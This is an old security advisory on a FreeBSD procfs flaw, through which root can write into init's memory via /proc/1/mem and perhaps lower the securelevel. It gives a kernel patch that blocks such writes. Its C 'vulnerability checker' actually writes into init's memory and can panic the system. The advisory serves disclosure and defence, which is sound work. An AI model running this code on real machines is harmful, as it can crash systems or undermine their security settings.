COMMAND

    procfs

SYSTEMS AFFECTED

    FreeBSD

PROBLEM

    Brian Mitchell posted  following.  There  is a slight  procfs hole
    that  could  allow  a  intruder  to  lower the securelevel. init's
    memory is  not protected,  so you  can overwrite data/instructions
    in init and possibly lower the securelevel (although panicing  the
    system is much more likely). Enclosed is a vulnerbility checker:

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <fcntl.h>

    main()
    {
            int tqbf=31337;
            int fd;
            int g0nz0;

            if(getuid())
            {
                    fprintf(stderr, "this attack needs root\n");
                    exit(1);
            }
            fd = open("/proc/1/mem", O_RDWR);
            if(fd < 0)
            {
                    fprintf(stderr, "open of /proc/1/mem failed\n");
                    exit(2);
            }
            lseek(fd, 0x1000, SEEK_SET);
            g0nz0=write(fd, &tqbf, sizeof(int));
            close(fd);
            if(g0nz0 >= 0)
                    fprintf(stderr, "procfs is vulnerable!\n");
            else
                    fprintf(stderr, "procfs is not vulnerable!\n");
            printf("returned %d\n", g0nz0);
    }

SOLUTION

    Here is a simple patch, it disallows writes to pid 1's mem node if
    securelevel  is  >  0  (diff  is  based  on  2.2.1  box  with  the
    securelevel fix applied):

    *** procfs_mem.c        Sat Sep  6 02:36:39 1997
    --- procfs_mem.c.new    Sat Sep  6 02:38:25 1997
    ***************
    *** 316,321 ****
    --- 316,325 ----
                !(curp->p_cred->pc_ucred->cr_gid == KMEM_GROUP &&
                  uio->uio_rw == UIO_READ))
                    return EPERM;
    +
    +       /* writing to init memory while securelevel > 0 is bad */
    +       if(uio->uio_rw == UIO_WRITE && p->p_pid == 1 && securelevel > 0)
    +               return EPERM;

            error = procfs_rwmem(p, uio);